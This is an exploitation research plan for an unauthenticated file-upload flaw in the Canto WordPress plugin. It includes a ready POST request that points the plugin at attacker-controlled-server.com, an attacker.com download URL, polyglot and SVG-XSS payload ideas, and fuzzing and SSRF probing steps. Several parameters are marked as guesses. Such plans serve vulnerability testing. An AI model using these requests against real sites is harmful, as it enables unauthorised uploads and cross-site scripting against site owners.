Exploitation Research Plan: CVE-2026-3335 (Canto <= 3.1.1)

1. Vulnerability Summary

The Canto plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Upload (restricted to WordPress-allowed MIME types) due to missing authorization and improper input validation in the standalone PHP file /wp-content/plugins/canto/includes/lib/copy-media.php.

The core issue is that this file can be accessed directly without loading the WordPress environment's standard security checks (if accessed before wp-load.php or if it includes wp-load.php without checking is_user_logged_in()). Furthermore, the script accepts critical configuration parameters—fbc_flight_domain, fbc_app_api, and fbc_app_token—directly from POST/GET requests. An attacker can point these parameters to a server they control, causing the WordPress server to fetch and "sideload" a file from the attacker's infrastructure into the WordPress Media Library.

2. Attack Vector Analysis

• Vulnerable Endpoint: http://<target>/wp-content/plugins/canto/includes/lib/copy-media.php
• Alternative Endpoints (Inferred): detail.php, download.php, get.php, tree.php (likely in the same directory).
• Attack Type: Missing Authorization / Unauthenticated File Upload via SSRF-like fetch.
• Parameters:
  • fbc_flight_domain: The domain of the "Canto" instance to fetch from (attacker-controlled).
  • fbc_app_api: The API path/endpoint on the remote server.
  • fbc_app_token: The authentication token for the remote server (attacker-defined).
  • name (inferred): Likely the filename to save as.
  • id or path (inferred): Likely the identifier of the file on the remote server.
• Authentication: None required.

3. Code Flow

1. Direct Request: An unauthenticated user sends a POST request to copy-media.php.
2. Parameter Extraction: The script reads $_POST['fbc_flight_domain'], $_POST['fbc_app_api'], and $_POST['fbc_app_token'].
3. Request Construction: The script constructs an HTTP request (likely using wp_remote_get or curl) to https://{fbc_flight_domain}/{fbc_app_api}/... using the provided token.
4. Remote Fetch: The WordPress server connects to the attacker-controlled domain.
5. Sideloading: The script receives the file content from the attacker's server and calls a WordPress function like wp_handle_sideload() or media_handle_sideload() to save the file into the wp-content/uploads/ directory and create an attachment in the database.

4. Nonce Acquisition Strategy

According to the vulnerability description, this endpoint is directly accessible without any nonce checks.

• No nonce is required because the file is accessed outside the standard admin-ajax.php or REST API flow where nonces are typically enforced.
• Bypass Confirmation: The research should confirm if copy-media.php includes wp-load.php. If it doesn't, it might be using raw PHP file_put_contents, which is even more dangerous. If it does, it's missing the current_user_can() check.

5. Exploitation Strategy

Step 1: Attacker Infrastructure Setup

The attacker must host a file and an API endpoint that mimics the Canto API response.

• Mock Canto API: Create a listener (e.g., using http_request or a simple webhook) that returns a file when queried.
• Payload: A file named exploit.png. While the description says it's constrained to allowed MIME types, a polyglot file or a file that can be leveraged later (like an SVG with XSS) should be used.

Step 2: Triggering the Upload

Send a POST request to the target's vulnerable script.

Request Details:

• URL: http://<target-ip>:8080/wp-content/plugins/canto/includes/lib/copy-media.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters (Inferred from description):

  fbc_flight_domain=attacker-controlled-server.com
  &fbc_app_api=api/v1/get-file
  &fbc_app_token=any-token
  &name=malicious-image.png
  &id=123
  

Step 3: Response Analysis

The script will likely return a JSON response or a success message if the sideloading was successful.

6. Test Data Setup

1. Install Plugin: wp plugin install canto --version=3.1.1 --activate
2. Verify File Existence: Confirm /wp-content/plugins/canto/includes/lib/copy-media.php exists.
3. Public Access Check: Ensure the plugin directory allows direct execution of PHP files (standard in default WordPress installs).

7. Expected Results

• The WordPress server makes an outbound HTTP request to the fbc_flight_domain.
• A new file appears in the /wp-content/uploads/YYYY/MM/ directory.
• A new entry is created in the wp_posts table with post_type = 'attachment'.
• The HTTP response from copy-media.php returns a 200 OK status, possibly containing the ID or URL of the newly created attachment.

8. Verification Steps

1. Check Media Library: Use WP-CLI to list recent attachments.

   wp post list --post_type=attachment --posts_per_page=5 --orderby=post_date --order=desc
   

2. Verify Filesystem: Check for the presence of the file in the uploads folder.

   find /var/www/html/wp-content/uploads -name "malicious-image.png"
   

3. Verify Unauthenticated Access: Repeat the HTTP request without any cookies to confirm no session is required.

9. Alternative Approaches

If copy-media.php requires specific parameters not fully detailed in the CVSS description:

1. Fuzzing Parameters: Fuzz the script for common sideloading parameters like file_url, url, download_url, or path.
2. Check Other Endpoints: If copy-media.php is restricted, test download.php or get.php in the same directory:
   • http://<target>/wp-content/plugins/canto/includes/lib/download.php?app_api=http://attacker.com/malicious.png
3. Information Leakage: Test tree.php or detail.php to see if they disclose internal paths or configurations by pointing app_api to a local resource (SSRF).